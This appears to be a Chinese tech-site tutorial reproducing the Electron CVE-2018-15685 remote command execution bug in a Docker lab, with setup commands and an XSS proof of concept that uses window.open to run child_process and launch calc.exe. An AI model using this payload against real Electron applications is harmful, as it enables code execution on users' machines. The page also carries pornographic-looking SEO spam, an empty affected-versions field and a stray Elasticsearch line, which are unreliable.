亚洲激情专区-91九色丨porny丨老师-久久久久久久女国产乱让韩-国产精品午夜小视频观看

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

怎樣解析Electron WebPreferences 遠程命令執行漏洞CVE-2018-15685

發布時間:2021-12-29 15:47:36 來源:億速云 閱讀:464 作者:柒染 欄目:安全技術

這篇文章給大家介紹怎樣解析Electron WebPreferences 遠程命令執行漏洞CVE-2018-15685,內容非常詳細,感興趣的小伙伴們可以參考借鑒,希望對大家能有所幫助。

漏洞描述

1.漏洞編號:CVE-2018-15685

2.影響版本:

3.漏洞產生原因:

Electron是由Github開發,用HTML,CSS和JavaScript來構建跨平臺桌面應用程序的一個開源庫。 Electron通過將Chromium和Node.js合并到同一個運行時環境中,并將其打包為Mac,Windows和Linux系統下的應用來實現這一目的。

Electron在設置了`nodeIntegration=false`的情況下(默認),頁面中的JavaScript無法訪問node.js的內置庫。CVE-2018-15685繞過了該限制,導致在用戶可執行JavaScript的情況下(如訪問第三方頁面或APP存在XSS漏洞時),能夠執行任意命令。

啟動環境:docker-compose up -d

vulnIP:192.168.1.232

環境啟動后,訪問`http://your-ip:8080`即可看到Electron默認首頁。怎樣解析Electron WebPreferences 遠程命令執行漏洞CVE-2018-15685

編譯APP

執行如下命令編譯一個包含漏洞的應用:

```
docker-compose run -e PLATFORM=win64 --rm electron
```

怎樣解析Electron WebPreferences 遠程命令執行漏洞CVE-2018-15685

其中PLATFORM的值是運行該應用的操作系統,可選項有:`win64`、`win32`、`mac`、`linux`。

編譯完成后,再執行如下命令,啟動web服務:

```
docker-compose run --rm -p 8080:80 web
```

怎樣解析Electron WebPreferences 遠程命令執行漏洞CVE-2018-15685

此時,訪問`http://your-ip:8080/cve-2018-15685.tar.gz`即可下載編譯好的應用。

怎樣解析Electron WebPreferences 遠程命令執行漏洞CVE-2018-15685

怎樣解析Electron WebPreferences 遠程命令執行漏洞CVE-2018-15685

怎樣解析Electron WebPreferences 遠程命令執行漏洞CVE-2018-15685

漏洞發現

關注ElasticSearch的版本

漏洞利用

在本地打開應用:

怎樣解析Electron WebPreferences 遠程命令執行漏洞CVE-2018-15685

怎樣解析Electron WebPreferences 遠程命令執行漏洞CVE-2018-15685

點擊提交,輸入框中的內容將會顯示在應用中,顯然這里存在一處XSS漏洞。

我們提交`<img src=1 onerror="require('child_process').exec('calc.exe')">`,發現沒有任何反饋,原因就是`nodeIntegration=false`。

此時,提交POC(Windows):

```

<img src=1 onerror="window.open().open('data:text/html,<script>require(\'child_process\').exec(\'calc.exe\')</script>');">

```

可見,calc.exe已成功彈出:

怎樣解析Electron WebPreferences 遠程命令執行漏洞CVE-2018-15685

關于怎樣解析Electron WebPreferences 遠程命令執行漏洞CVE-2018-15685就分享到這里了,希望以上內容可以對大家有一定的幫助,可以學到更多知識。如果覺得文章不錯,可以把它分享出去讓更多的人看到。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

安义县| 威海市| 上虞市| 湖北省| 章丘市| 东乡| 武隆县| 余干县| 双辽市| 纳雍县| 灌南县| 玉溪市| 长子县| 遂宁市| 香格里拉县| 西峡县| 理塘县| 巩留县| 阜平县| 吉安市| 竹溪县| 贵港市| 宜春市| 武鸣县| 濮阳市| 曲沃县| 淮北市| 鄂托克前旗| 密山市| 友谊县| 天津市| 永寿县| 万年县| 景宁| 东平县| 宽甸| 塔河县| 江安县| 滦南县| 平潭县| 东明县|